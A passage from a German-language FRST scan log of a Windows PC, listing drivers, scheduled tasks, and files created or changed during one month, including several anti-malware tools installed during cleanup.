der Ausnahmeliste) ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-03-21] (Avira Operations GmbH & Co. KG) R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-21] (Avira Operations GmbH & Co. KG) S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-28] (Qualcomm Atheros) S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation) R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-01-10] (Acer Incorporated) R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-29] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-09-03] (Corel Corporation) S3 QRDCIO; C:\Windows\System32\drivers\QRDCIO.sys [9728 2009-10-20] (QUANTA) R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [15704 2013-01-10] (Acer Incorporated) R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [455240 2013-03-05] (RTS Corporation) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation) R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-29 19:05 - 2016-03-29 19:06 - 00015408 _____ C:\Users\Denny\Desktop\FRST.txt 2016-03-29 18:17 - 2016-03-29 18:18 - 03102208 _____ C:\Users\Denny\Desktop\AdwCleaner_5.107.exe 2016-03-29 18:14 - 2016-03-29 18:14 - 00001192 _____ C:\Users\Denny\Desktop\mbam.txt 2016-03-29 16:48 - 2016-03-29 18:49 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-03-29 16:48 - 2016-03-29 18:20 - 00001072 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2016-03-29 16:43 - 2016-03-29 16:47 - 22851472 _____ (Malwarebytes ) C:\Users\Denny\Downloads\mbam-setup-2.2.1.1043.exe 2016-03-29 16:34 - 2016-03-29 16:37 - 00020251 _____ C:\Users\Denny\Desktop\Fixlog.txt 2016-03-29 12:52 - 2016-03-29 13:00 - 00231358 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.52.00_log.txt 2016-03-29 12:50 - 2016-03-29 12:51 - 00008896 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.50.27_log.txt 2016-03-29 12:49 - 2016-03-29 12:50 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\Denny\Desktop\tdsskiller.exe 2016-03-29 12:45 - 2016-03-29 12:45 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-03-28 23:46 - 2016-03-29 16:41 - 00000000 ____D C:\Users\Denny\Desktop\Infos 2016-03-28 23:36 - 2016-03-28 23:37 - 00031180 _____ C:\Users\Denny\Downloads\Addition.txt 2016-03-28 23:34 - 2016-03-29 19:05 - 00000000 ____D C:\FRST 2016-03-28 23:34 - 2016-03-28 23:37 - 00051376 _____ C:\Users\Denny\Downloads\FRST.txt 2016-03-28 23:33 - 2016-03-28 23:33 - 02374144 _____ (Farbar) C:\Users\Denny\Desktop\FRST64.exe 2016-03-28 23:32 - 2016-03-28 23:32 - 01725440 _____ (Farbar) C:\Users\Denny\Downloads\FRST.exe 2016-03-28 23:18 - 2016-03-28 23:28 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-500 2016-03-28 23:18 - 2016-03-28 23:18 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Avira 2016-03-28 23:10 - 2016-03-28 23:24 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Local\Packages 2016-03-28 23:10 - 2016-03-28 23:10 - 00001454 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-28 23:10 - 2016-03-28 23:10 - 00000020 ___SH C:\Users\Administrator.Schneider\ntuser.ini 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Vorlagen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Startmenü 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Netzwerkumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Lokale Einstellungen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Eigene Dateien 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Druckumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Videos 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Musik 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Bilder 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Verlauf 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 __SHD C:\Users\Administrator\IntelGraphicsProfiles 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Adobe 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider 2016-03-28 23:10 - 2014-03-29 08:08 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Macromedia 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2016-03-22 02:54 - 2016-03-22 02:54 - 01610352 _____ (Malwarebytes) C:\Users\Denny\Downloads\JRT.exe 2016-03-22 00:31 - 2016-03-22 00:31 - 01474568 _____ C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe 2016-03-22 00:21 - 2016-03-29 18:20 - 00001123 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-29 18:20 - 00001117 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-22 00:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-03-21 23:58 - 2016-03-21 23:58 - 00242376 _____ C:\Users\Denny\Downloads\Firefox Setup Stub 45.0.1.exe 2016-03-21 23:26 - 2016-02-20 17:45 - 01373184 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 01168896 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00696832 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2016-03-21 23:26 - 2016-02-05 21:06 - 00046768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-03-21 23:26 - 2016-01-24 20:19 - 00419160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00378712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00331608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-03-21 23:26 - 2016-01-24 13:57 - 01335296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-03-21 23:26 - 2016-01-24 13:45 - 01063424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-03-21 23:26 - 2016-01-09 03:38 - 00091992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys 2016-03-21 23:26 - 2016-01-06 20:25 - 00416768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-03-21 23:26 - 2015-12-30 23:53 - 02017624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2016-03-21 23:23 - 2016-02-06 18:58 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-03-21 23:23 - 2016-02-06 18:32 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-03-21 23:23 - 2016-01-10 18:41 - 01707008 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2016-03-21 23:23 - 2016-01-10 18:31 - 01344512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00218448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00192120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll 2016-03-21 23:23 - 2016-01-07 01:46 - 00148752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll 2016-03-21 23:23 - 2016-01-07 01:45 - 00177712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll 2016-03-21 23:23 - 2016-01-06 18:47 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2016-03-21 23:23 - 2015-12-30 22:49 - 00470360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2016-03-21 23:23 - 2015-12-20 16:57 - 00839168 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2016-03-21 23:23 - 2015-12-20 16:43 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2016-03-21 23:23 - 2015-11-19 16:33 - 00994760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2016-03-21 23:23 - 2015-11-19 16:26 - 00922432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2016-03-21 22:54 - 2016-03-29 18:39 - 00000000 ____D C:\AdwCleaner 2016-03-21 22:27 - 2016-03-21 22:36 - 00000000 ____D C:\Users\Denny\Desktop\Pferd 2016-03-21 18:50 - 2016-03-21 18:50 - 600300950 _____ C:\WINDOWS\MEMORY.DMP 2016-03-21 18:50 - 2016-03-21 18:50 - 00284928 _____ C:\WINDOWS\Minidump\032116-30421-01.dmp 2016-03-21 18:44 - 2016-01-15 18:56 - 02487296 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-03-21 18:44 - 2016-01-15 18:45 - 01482240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-03-21 18:44 - 2016-01-05 17:00 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-03-21 18:44 - 2015-12-20 16:56 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msra.exe 2016-03-21 18:37 - 2016-03-29 18:20 - 00001192 _____ C:\Users\Public\Desktop\Avira Antivirus.lnk 2016-03-21 18:37 - 2016-03-21 18:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira 2016-03-21 18:15 - 2016-03-21 18:15 - 00000000 ____D C:\Users\Denny\AppData\Local\app 2016-03-21 18:14 - 2016-03-21 18:43 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Avira 2016-03-21 18:07 - 2016-03-21 18:35 - 00000000 ____D C:\ProgramData\Avira 2016-03-21 18:07 - 2016-03-21 18:34 - 00137952 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00128664 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00068936 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00035488 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys 2016-03-21 18:07 - 2016-03-21 18:07 - 00000000 ____D C:\Program Files (x86)\Avira 2016-03-21 17:38 - 2016-03-08 09:00 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-03-21 17:38 - 2016-03-08 09:00 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-03-21 16:28 - 2016-02-12 21:14 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-03-21 16:28 - 2016-02-12 17:14 - 03708416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-03-21 16:28 - 2016-02-12 16:55 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:51 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:48 - 02244096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll 2016-03-21 16:28 - 2016-02-12 16:47 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2016-03-21 16:28 - 2016-02-12 16:46 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2016-03-21 16:24 - 2016-02-08 23:05 - 20352512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:34 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-03-21 16:24 - 2016-02-08 22:29 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll 2016-03-21 16:24 - 2016-02-08 22:10 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-03-21 16:24 - 2016-02-08 22:05 - 25816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:03 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 13012480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 22:01 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 21:43 - 02121216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-03-21 16:24 - 2016-02-08 20:27 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-03-21 16:24 - 2016-02-08 20:26 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-03-21 16:24 - 2016-02-08 20:16 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-03-21 16:24 - 2016-02-08 20:14 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-03-21 16:24 - 2016-02-08 20:13 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2016-03-21 16:24 - 2016-02-08 19:42 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2016-03-21 16:24 - 2016-02-08 19:37 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2016-03-21 16:24 - 2016-02-08 19:34 - 00798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 14613504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 19:19 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-03-21 16:24 - 2016-02-08 19:15 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll 2016-03-21 16:24 - 2016-02-08 19:07 - 01546752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-03-21 16:24 - 2016-02-08 18:55 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 22:39 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-03-21 16:23 - 2016-02-08 22:28 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2016-03-21 16:23 - 2016-02-08 22:07 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-03-21 16:23 - 2016-02-08 21:39 - 01311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-03-21 16:23 - 2016-02-08 21:38 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 19:51 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00869576 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00678600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00875720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00536776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-05 16:59 - 07784960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:55 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:48 - 07075840 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll 2016-03-21 16:19 - 2016-02-05 16:47 - 05268480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll 2016-03-21 16:18 - 2016-02-03 22:37 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-03-21 16:18 - 2016-02-03 22:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-03-21 16:18 - 2016-02-03 17:09 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2016-03-21 16:13 - 2016-02-06 20:08 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll 2016-03-21 16:13 - 2016-02-05 21:07 - 00292696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 21:07 - 00243032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 17:03 - 15432704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-03-21 16:13 - 2016-02-05 17:00 - 13318144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-03-21 16:13 - 2016-02-04 20:18 - 04174336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-03-21 16:13 - 2016-02-04 20:18 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2016-03-21 16:13 - 2016-02-04 20:12 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:44 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2016-03-21 16:13 - 2016-02-04 19:39 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:24 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll 2016-03-21 16:13 - 2016-02-04 19:02 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll 2016-03-21 16:13 - 2016-01-31 21:16 - 00148832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS 2016-03-09 09:51 - 2016-03-09 09:51 - 00000000 ____D C:\Users\Denny\AppData\Local\VirtualStore 2016-03-08 14:19 - 2016-03-21 15:58 - 00000000 ____D C:\Users\Denny\Desktop\bewerbung philipp 2016-03-08 14:00 - 2016-03-08 14:00 - 00137615 _____ C:\Users\Denny\Desktop\EPSON002.png.PDF 2016-03-08 13:19 - 2016-03-08 13:19 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\Denny\Downloads\avira_de_av_56deb4d03eff9__ws.exe 2016-03-08 12:16 - 2016-03-08 12:16 - 00000000 ____D C:\Program Files (x86)\DATA BECKER 2016-03-08 12:16 - 1998-11-17 14:44 - 00328704 _____ (InstallShield Software Corporation ) C:\WINDOWS\IsUn0407.exe 2016-03-08 12:13 - 2016-03-08 12:13 - 01470472 _____ C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe 2016-03-08 12:06 - 2016-03-29 18:44 - 00001231 _____ C:\Users\Denny\Desktop\Continue Last version Installation.lnk 2016-03-08 11:46 - 2016-03-08 11:59 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim(1).exe 2016-03-08 11:44 - 2016-03-08 11:46 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim.exe 2016-03-07 22:16 - 2016-03-07 22:16 - 00000000 ____D C:\Users\Denny\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108 2016-03-05 22:21 - 2016-03-05 22:21 - 00003728 _____ C:\WINDOWS\System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-29 19:04 - 2016-02-05 00:38 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2016-03-29 18:54 - 2015-11-01 22:59 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-1001 2016-03-29 18:53 - 2013-09-30 06:14 - 01776918 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-03-29 18:53 - 2013-09-30 05:56 - 00765582 _____ C:\WINDOWS\system32\perfh007.dat 2016-03-29 18:53 - 2013-09-30 05:56 - 00159366 _____ C:\WINDOWS\system32\perfc007.dat 2016-03-29 18:53 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf 2016-03-29 18:49 - 2013-10-24 13:02 - 00000000 ___DO C:\Users\Denny\SkyDrive 2016-03-29 18:46 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-03-29 18:44 - 2013-10-13 12:41 - 00001921 _____ C:\Users\Denny\Desktop\SonyEditor.lnk 2016-03-29 18:41 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Globalization 2016-03-29 18:41 - 2013-08-22 15:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI 2016-03-29 18:20 - 2015-11-01 23:05 - 00001132 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\zc1h3r7o5m4e.lnk 2016-03-29 18:20 - 2014-12-24 23:20 - 00001058 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-12-24 23:20 - 00001052 _____ C:\Users\Public\Desktop\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001315 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-05-19 22:09 - 00002213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk 2016-03-29 18:20 - 2014-03-29 08:08 - 00001047 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Download Assistant.lnk 2016-03-29 18:20 - 2013-12-07 10:06 - 00001110 _____ C:\Users\Public\Desktop\Acer Portal.lnk 2016-03-29 18:20 - 2013-11-10 21:21 - 00001178 _____ C:\Users\Public\Desktop\Acer Remote Files.lnk 2016-03-29 18:20 - 2013-11-10 21:20 - 00001140 _____ C:\Users\Public\Desktop\Acer Docs.lnk 2016-03-29 18:20 - 2013-10-24 12:44 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-03-29 18:20 - 2013-09-07 22:32 - 00000928 _____ C:\Users\Public\Desktop\EPSON Scan.lnk 2016-03-29 18:19 - 2016-02-19 13:56 - 00001454 _____ C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-29 18:17 - 2014-05-16 21:31 - 00000000 ____D 